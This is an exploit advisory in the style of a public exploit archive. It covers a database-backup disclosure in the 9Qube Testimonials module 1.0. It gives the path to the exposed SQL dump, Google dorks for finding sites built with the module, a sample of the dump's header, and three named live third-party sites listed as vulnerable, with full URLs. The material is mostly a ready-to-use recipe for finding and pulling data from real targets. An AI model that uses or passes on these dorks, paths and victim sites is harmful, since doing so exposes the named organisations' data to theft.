ITAdvisorsNepal 9Qube Testimonials module version 1.0 suffers from a database disclosure vulnerability.
187d7f5c91495e326458ff0f2a738234#################################################################################################
# Exploit Title : ITAdvisorsNepal 9Qube Testimonials Modules 1.0 Database
Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 17/12/2018
# Vendor Homepage : itadvisorsnepal.com ~ 9qube.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# Google Dorks : intext:''Designed & developed by IT Advisors Nepal''
+ intext:''Powered by IT Advisors Nepal''
+ intext:''Crafted by 9Qube''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Exploit :
/application/modules/testimonials/testimonials.sql
#################################################################################################
**********************************************
# Example SQL Dump Informations =>
-- phpMyAdmin SQL Dump
-- version 4.4.9
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.6.24-72.2
-- PHP Version: 5.6.99-hhvm
INSERT INTO `testimonials` (`id`, `title`, `organization`, `description`,
`image`, `url`, `status`,
`created_on`, `created_by`, `updated_on`, `updated_by`) VALUES
-- Database: `9qube.com`
-- Table structure for table `testimonials`
-- Dumping data for table `testimonials`
-- Indexes for table `testimonials`
-- AUTO_INCREMENT for table `testimonials`
**********************************************
#################################################################################################
# Example Vulnerable Sites =>
[+] exim-nepal.com/application/modules/testimonials/testimonials.sql
[+] britishamerican.edu.np/application/modules/testimonials/testimonials.sql
[+] omnetworks.com.np/application/modules/testimonials/testimonials.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################